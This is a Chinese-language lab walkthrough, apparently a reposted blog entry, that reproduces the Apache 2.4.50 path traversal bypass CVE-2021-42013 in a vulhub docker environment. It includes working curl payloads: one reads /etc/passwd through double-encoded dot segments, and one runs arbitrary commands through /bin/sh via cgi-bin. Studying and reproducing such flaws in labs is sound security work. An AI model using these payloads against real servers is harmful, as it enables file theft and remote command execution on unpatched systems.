Apache HTTP Server 2.4.50 路径穿越漏洞(CVE-2021-42013)

Apache HTTP Server 2.4.50 路径穿越漏洞(CVE-2021-42013)

Apache官方在2.4.50版本中对2.4.49版本中出现的目录穿越漏洞CVE-2021-41773进行了修复,但这个修复是不完整的,CVE-2021-42013是对补丁的绕过。

攻击者利用这个漏洞,可以读取位于Apache服务器Web目录以外的其他文件,或者读取Web目录中的脚本文件源码,或者在开启了cgi或cgid的服务器上执行任意命令。

这个漏洞可以影响Apache HTTP Server 2.4.49以及2.4.50两个版本。

参考链接:https://github.com/vulhub/vulhub/blob/master/httpd/CVE-2021-42013/README.zh-cn.md

环境搭建

进入vulhub/httpd/CVE-2021-42013
docker-compose build
docker-compose up -d

访问本机ip的8080端口

Apache HTTP Server 2.4.50 路径穿越漏洞(CVE-2021-42013)_第1张图片

漏洞复现

再次使用CVE-2021-41773中的方法测试发现已经失效。

CVE-2021-41773复现过程:
https://blog.csdn.net/weixin_47311099/article/details/121771872

绕过方式使用%%32%65替换%2e即可,%32%65解码等于2e

curl -v --path-as-is http://your-ip:8080/icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd

Apache HTTP Server 2.4.50 路径穿越漏洞(CVE-2021-42013)_第2张图片

如果服务端开启了cgi或cgid这两个mod的情况下,这个路径穿越漏洞将可以执行任意命令:

curl -v --data "echo;命令" 'http://your-ip:8080/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh'

Apache HTTP Server 2.4.50 路径穿越漏洞(CVE-2021-42013)_第3张图片

你可能感兴趣的:(apache,web安全,网络安全,渗透测试)